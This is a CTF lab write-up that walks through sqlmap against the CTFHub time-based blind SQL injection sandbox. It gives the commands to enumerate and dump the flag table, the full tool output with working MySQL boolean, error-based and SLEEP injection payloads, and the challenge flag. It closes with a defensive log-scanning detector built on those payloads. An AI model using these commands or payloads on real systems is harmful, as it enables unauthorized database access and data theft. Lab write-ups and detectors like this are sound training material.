CTFHub SQL Injection: Time-Based Blind Injection (sqlmap)
0x00 Brief Introduction
This article uses the CTFHub time-based blind injection challenge to briefly record the workflow of using sqlmap.
Reference: sqlmap user manual | WooYun Knowledge Base (xmd5.com)
What sqlmap does:
1. Determine which parameters are injectable
2. Determine which SQL injection technique can be used
3. Identify which database is in use
4. Read the data the user selects
(The full process is shown in the case at the end of the article.)
sqlmap supports five different injection techniques:
1. Boolean-based blind injection: whether the injected condition is true or false can be determined from the returned page.
2. Time-based blind injection: nothing can be determined from the page content, so a conditional statement containing a time delay is used, and whether the delay executed (i.e. whether the response time increased) reveals whether the condition was true.
3. Error-based injection: the page returns error messages, or the result of the injected statement is returned directly in the page.
4. UNION query injection: injection where UNION can be used.
5. Stacked query injection: injection where multiple statements can be executed in one request.
0x01 List the databases
python sqlmap.py -u http://challenge-493b66302b18faed.sandbox.ctfhub.com:10800/?id=2 --dbs
-u: target URL
--dbs: enumerate the databases
0x02 List the tables of the target database
Go through all the databases found in 0x01 (performance_schema is used for performance analysis and information_schema stores database metadata (data about data); both are MySQL's built-in databases and can be ignored).
python sqlmap.py -u http://challenge-493b66302b18faed.sandbox.ctfhub.com:10800/?id=2 -D sqli --tables
-D: specify the database (here sqli)
--tables: list all tables in that database
0x03 List the columns of the target table
We are obviously interested in the flag table.
python sqlmap.py -u http://challenge-493b66302b18faed.sandbox.ctfhub.com:10800/?id=2 -D sqli -T flag --columns
-T: specify the table (here flag)
--columns: list all columns of that table
0x04 Dump the data from the target table
python sqlmap.py -u http://challenge-493b66302b18faed.sandbox.ctfhub.com:10800/?id=2 -D sqli -T flag -C flag --dump
-C: specify the column (here the flag column we are after)
--dump: retrieve the data
Below is sqlmap's output for the final step 0x04 (the SQL injection process):
D:\Plug_in\sqlmap-master>python sqlmap.py -u http://challenge-4d26a8e654d68212.sandbox.ctfhub.com:10800/?id=2 -D sqli -T flag -C flag --dump
___
__H__
___ ___[,]_____ ___ ___ {1.5.8#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:24:10 /2021-08-07/
[16:24:10] [INFO] testing connection to the target URL
[16:24:10] [INFO] checking if the target is protected by some kind of WAF/IPS
[16:24:10] [INFO] testing if the target URL content is stable
[16:24:10] [INFO] target URL content is stable
[16:24:10] [INFO] testing if GET parameter 'id' is dynamic
[16:24:11] [WARNING] GET parameter 'id' does not appear to be dynamic
[16:24:11] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[16:24:11] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[16:24:11] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[16:24:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:24:22] [WARNING] reflective value(s) found and filtering out
[16:24:22] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[16:24:22] [INFO] testing 'Generic inline queries'
[16:24:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:24:24] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:24:26] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[16:24:28] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:24:29] [INFO] GET parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[16:24:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[16:24:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[16:24:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[16:24:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[16:24:29] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[16:24:29] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[16:24:29] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[16:24:29] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[16:24:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:24:29] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[16:24:29] [INFO] testing 'MySQL inline queries'
[16:24:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[16:24:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[16:24:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[16:24:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[16:24:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[16:24:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[16:24:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[16:24:40] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[16:24:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:24:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:24:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:24:40] [INFO] target URL appears to have 2 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] y
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[16:24:48] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[16:24:49] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[16:24:52] [INFO] testing 'MySQL UNION query (35) - 1 to 20 columns'
[16:24:54] [INFO] testing 'MySQL UNION query (35) - 21 to 40 columns'
[16:24:55] [INFO] testing 'MySQL UNION query (35) - 41 to 60 columns'
[16:24:56] [INFO] testing 'MySQL UNION query (35) - 61 to 80 columns'
[16:24:57] [INFO] testing 'MySQL UNION query (35) - 81 to 100 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 344 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=2 RLIKE (SELECT (CASE WHEN (3982=3982) THEN 2 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=2 AND (SELECT 5108 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT (ELT(5108=5108,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2 AND (SELECT 9417 FROM (SELECT(SLEEP(5)))rRTT)
---
[16:25:01] [INFO] the back-end DBMS is MySQL
web application technology: OpenResty 1.19.3.2, PHP 7.3.14
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[16:25:01] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'sqli'
[16:25:01] [INFO] retrieved: 'ctfhub{34e19ddc5ce73c4bea083c02}'
Database: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag |
+----------------------------------+
| ctfhub{34e19ddc5ce73c4bea083c02} |
+----------------------------------+
[16:25:01] [INFO] table 'sqli.flag' dumped to CSV file 'C:\Users\86187\AppData\Local\sqlmap\output\challenge-4d26a8e654d68212.sandbox.ctfhub.com\dump\sqli\flag.csv'
[16:25:01] [INFO] fetched data logged to text files under 'C:\Users\86187\AppData\Local\sqlmap\output\challenge-4d26a8e654d68212.sandbox.ctfhub.com'
[*] ending @ 16:25:01 /2021-08-07/
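From the defender's side, the injection points sqlmap listed above (RLIKE/CASE WHEN, FLOOR(RAND()) ... GROUP BY, SLEEP) are exactly what should stand out in a web server's access log. The following detector is an added example, not code from the write-up or from sqlmap; the log lines are constructed from the payloads above, and it assumes the last log field is the request time in seconds (as nginx's $request_time would be if added to the log format).

```python
# Added detection example (not from the CTFHub write-up or sqlmap): flag the
# techniques sqlmap reported above in web access logs. Log lines are constructed;
# the trailing field is assumed to be the request time in seconds.
import re
from urllib.parse import unquote_plus

# Signatures derived from the payloads sqlmap printed for parameter 'id'.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bRLIKE\b|\bCASE\s+WHEN\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(.*GROUP\s+BY", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "union-based": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}
# client - - [ts] "METHOD target proto" status bytes "referer" "agent" rtime
LOG_FORMAT = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) \S+" \d{3} \d+ "[^"]*" "([^"]*)" ([0-9.]+)$')
UA = '"sqlmap/1.5.8#stable (http://sqlmap.org)"'
SAMPLE_LOG = [  # constructed from the payloads in the sqlmap output above
    '203.0.113.5 - - [07/Aug/2021:16:24:29 +0000] "GET /?id=2%20RLIKE%20(SELECT%20'
    '(CASE%20WHEN%20(3982=3982)%20THEN%202%20ELSE%200x28%20END)) HTTP/1.1" 200 1024 "-" ' + UA + ' 0.004',
    '203.0.113.5 - - [07/Aug/2021:16:24:29 +0000] "GET /?id=2%20AND%20(SELECT%205108%20FROM(SELECT%20'
    'COUNT(*),CONCAT(0x716b7a6271,(SELECT%20(ELT(5108=5108,1))),0x716b7a7871,FLOOR(RAND(0)*2))x'
    '%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a) HTTP/1.1" 200 1187 "-" ' + UA + ' 0.006',
    '203.0.113.5 - - [07/Aug/2021:16:24:35 +0000] "GET /?id=2%20AND%20(SELECT%209417%20FROM%20'
    '(SELECT(SLEEP(5)))rRTT) HTTP/1.1" 200 1024 "-" ' + UA + ' 5.012',
    '198.51.100.7 - - [07/Aug/2021:16:24:36 +0000] "GET /?id=2 HTTP/1.1" 200 1024 "-" "Mozilla/5.0" 0.003',
]

def classify(line, slow_threshold=4.0):
    """Return (client, findings) for one log line, or None if it does not parse."""
    m = LOG_FORMAT.match(line)
    if not m:
        return None
    client, target, agent, rtime = m.groups()
    decoded = unquote_plus(target)  # payloads arrive URL-encoded
    findings = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    # Time-based injection leaks through latency, not content: confirm the SLEEP
    # payload by the server-side delay it actually caused.
    if "time-based blind" in findings and float(rtime) >= slow_threshold:
        findings.append("delay observed")
    if "sqlmap" in agent.lower():  # default UA; never rely on this alone
        findings.append("sqlmap user-agent")
    return client, findings

def scan_log(lines):
    """Count findings per client; a probing burst (344 requests above) stands out."""
    report = {}
    for client, findings in filter(None, map(classify, lines)):
        bucket = report.setdefault(client, {})
        for f in findings:
            bucket[f] = bucket.get(f, 0) + 1
    return report
```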